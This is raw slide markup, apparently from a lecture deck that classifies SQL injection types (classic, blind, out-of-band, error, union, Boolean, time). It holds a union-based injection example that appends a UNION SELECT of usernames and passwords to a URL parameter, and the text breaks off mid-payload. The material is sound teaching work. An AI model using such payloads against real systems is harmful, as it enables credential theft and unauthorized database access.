            <a:r>
              <a:rPr dirty="0" sz="4450" spc="-300">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> (Classic)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43526" y="4978383"/>
            <a:ext cx="8900795" cy="2047875"/>
            <a:chOff x="3543526" y="4978383"/>
            <a:chExt cx="8900795" cy="2047875"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="12" name="object 12"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3574959" y="500981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60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434928" y="500981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60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993871" y="6046371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499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8" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4260836" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4310801" y="8058"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4354194" y="30500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4388414" y="64719"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4410854" y="108113"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4418913" y="158079"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4418913" y="790380"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4410854" y="840344"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4388414" y="883738"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4354194" y="917957"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4310801" y="940397"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4260836" y="948456"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="158078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499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194589" y="6136641"/>
            <a:ext cx="4018279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90">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Inferential</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4450" spc="-290">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4450" spc="-150">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>(Blind)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03466" y="4978383"/>
            <a:ext cx="8900795" cy="2072639"/>
            <a:chOff x="10403466" y="4978383"/>
            <a:chExt cx="8900795" cy="2072639"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="17" name="object 17"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10434899" y="5009816"/>
              <a:ext cx="6860540" cy="0"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="6860540" h="0">
                  <a:moveTo>
                    <a:pt x="6859966" y="0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853788" y="6070872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499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8" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4260836" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4310801" y="8058"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4354194" y="30500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4388414" y="64719"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4410854" y="108113"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4418913" y="158079"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4418913" y="790380"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4410854" y="840344"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4388414" y="883738"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4354194" y="917957"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4310801" y="940397"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4260836" y="948456"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="158078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499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641482" y="6161771"/>
            <a:ext cx="284416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190">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Out-of-Band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0916" y="4978383"/>
            <a:ext cx="16825595" cy="4960620"/>
            <a:chOff x="500916" y="4978383"/>
            <a:chExt cx="16825595" cy="4960620"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="21" name="object 21"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="17294866" y="500981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60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74959" y="6984237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59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434928" y="701488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59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32349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2954811" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="158077" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="108113" y="8058"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="64719" y="30499"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="30499" y="64718"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8058" y="108113"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="158078"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="790384"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8058" y="840346"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="30499" y="883739"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="64719" y="917960"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="108113" y="940403"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="158077" y="948463"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2954811" y="948463"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3004777" y="940403"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3048171" y="917960"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3082390" y="883739"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3104831" y="840346"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3112890" y="790384"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3112890" y="158078"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3104831" y="108113"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3082390" y="64718"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3048171" y="30499"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3004777" y="8058"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2954811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32349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0" y="158079"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="8058" y="108113"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="30500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9" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2954811" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3004776" y="8058"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3048172" y="30500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3082394" y="64719"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3104837" y="108113"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3112896" y="158079"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3112896" y="790380"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3104837" y="840344"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3082394" y="883738"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3048172" y="917957"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3004776" y="940397"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2954811" y="948456"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="158079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500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496898" y="9049222"/>
            <a:ext cx="118237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50">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Er</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4450" spc="-240">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>r</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4450" spc="-30">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>or</a:t>
            </a:r>
            <a:endParaRPr sz="44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28010" y="8958669"/>
            <a:ext cx="3113405" cy="948690"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3113404" h="948690">
                <a:moveTo>
                  <a:pt x="0" y="158079"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="8058" y="108113"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="30500" y="64719"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="64719" y="30500"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="108113" y="8058"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="158079" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2954811" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3004776" y="8058"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3048172" y="30500"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3082394" y="64719"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3104837" y="108113"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3112896" y="158079"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3112896" y="790380"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3104837" y="840344"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3082394" y="883738"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3048172" y="917957"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3004776" y="940397"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2954811" y="948456"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="158079" y="948456"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="108113" y="940397"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="64719" y="917957"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="30500" y="883738"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8058" y="840344"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="790380"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="158079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979367" y="9049222"/>
            <a:ext cx="141097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85">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>U</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4450" spc="-215">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4450" spc="25">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4450" spc="-130">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>o</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4450" spc="-140">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>n</a:t>
            </a:r>
            <a:endParaRPr sz="44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93871" y="8958669"/>
            <a:ext cx="3113405" cy="948690"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3113404" h="948690">
                <a:moveTo>
                  <a:pt x="0" y="158079"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="8058" y="108113"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="30500" y="64719"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="64719" y="30500"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="108113" y="8058"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="158079" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2954811" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3004776" y="8058"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3048172" y="30500"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3082394" y="64719"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3104837" y="108113"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3112896" y="158079"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3112896" y="790380"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3104837" y="840344"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3082394" y="883738"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3048172" y="917957"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3004776" y="940397"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2954811" y="948456"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="158079" y="948456"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="108113" y="940397"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="64719" y="917957"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="30500" y="883738"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8058" y="840344"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="790380"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="158079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595896" y="9049222"/>
            <a:ext cx="190944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20">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Boolean</a:t>
            </a:r>
            <a:endParaRPr sz="4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651163" y="8958669"/>
            <a:ext cx="3113405" cy="948690"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3113405" h="948690">
                <a:moveTo>
                  <a:pt x="0" y="158079"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="8058" y="108113"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="30500" y="64719"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="64719" y="30500"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="108113" y="8058"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="158079" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2954811" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3004776" y="8058"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3048172" y="30500"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3082394" y="64719"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3104837" y="108113"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3112896" y="158079"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3112896" y="790380"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3104837" y="840344"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3082394" y="883738"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3048172" y="917957"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3004776" y="940397"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2954811" y="948456"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="158079" y="948456"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="108113" y="940397"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="64719" y="917957"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="30500" y="883738"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8058" y="840344"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="790380"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="158079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2625554" y="9049222"/>
            <a:ext cx="116459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60">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Ti</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4450" spc="-160">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>m</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4450" spc="-260">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>e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675006" y="7967631"/>
            <a:ext cx="11245850" cy="992505"/>
            <a:chOff x="1675006" y="7967631"/>
            <a:chExt cx="11245850" cy="992505"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="34" name="object 34"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1706408" y="8010206"/>
              <a:ext cx="1868805" cy="0"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1868804" h="0">
                  <a:moveTo>
                    <a:pt x="1868551" y="0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706419" y="8010206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w="0" h="948690">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="948456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427300" y="8011200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w="0" h="948690">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="948456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550316" y="7999044"/>
              <a:ext cx="885190" cy="948690"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="885190" h="948690">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="948456"/>
                  </a:lnTo>
                </a:path>
                <a:path w="885190" h="948690">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="884608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434928" y="7999044"/>
              <a:ext cx="2454910" cy="0"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2454909" h="0">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2454401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2889346" y="7999044"/>
              <a:ext cx="0" cy="960119"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="0" h="960120">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="959628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534435" y="8014263"/>
              <a:ext cx="1892935" cy="20320"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1892935" h="20320">
                  <a:moveTo>
                    <a:pt x="1892864" y="20266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800417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35"/>
              <a:t>Union-Based</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-665"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-335"/>
              <a:t>SQLi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44752" y="2931714"/>
            <a:ext cx="15906750" cy="340931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algn="just" marL="389255" marR="5080" indent="-377190">
              <a:lnSpc>
                <a:spcPct val="90300"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="650"/>
              </a:spcBef>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="389890" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-204">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Union-based </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-545">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>SQLI </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-229">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>is </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-240">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>an </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-140">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>in-band </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-505">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>SQLi </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-135">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>technique </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>that </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-260">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>leverages </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-45">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>the  </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-340">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>UNION </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-685">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-100">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>operator </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="45">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>to</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-955">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-170">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>combine </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-45">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>the </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-155">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>results </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>of </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="20">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>two </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-170">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>queries </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-15">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>into </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-350">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>a  </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-204">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>single </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-100">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>result</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-280">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-175">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>set</a:t>
            </a:r>
            <a:endParaRPr sz="4600">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just" marL="389255" indent="-377190">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="475"/>
              </a:spcBef>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="389890" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-265">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Example:</a:t>
            </a:r>
            <a:endParaRPr sz="46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395"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-45">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Input:</a:t>
            </a:r>
            <a:endParaRPr sz="3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1576" y="6541999"/>
            <a:ext cx="16341090" cy="52070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1590" rIns="0" bIns="0" rtlCol="0" vert="horz">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="452120">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="170"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="6096000" algn="l"/>
                <a:tab pos="7305675" algn="l"/>
                <a:tab pos="8717280" algn="l"/>
                <a:tab pos="10733405" algn="l"/>
                <a:tab pos="12547600" algn="l"/>
                <a:tab pos="13555980" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2850" spc="105">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>www.random.com/app.php?id=</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2850" spc="105">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2850" spc="105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850" spc="-254">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>UNION	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2850" spc="-265">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>SELECT	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2850" spc="90">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>username,	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2850" spc="60">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>password	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2850" spc="-515">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>FROM	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2850" spc="315">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
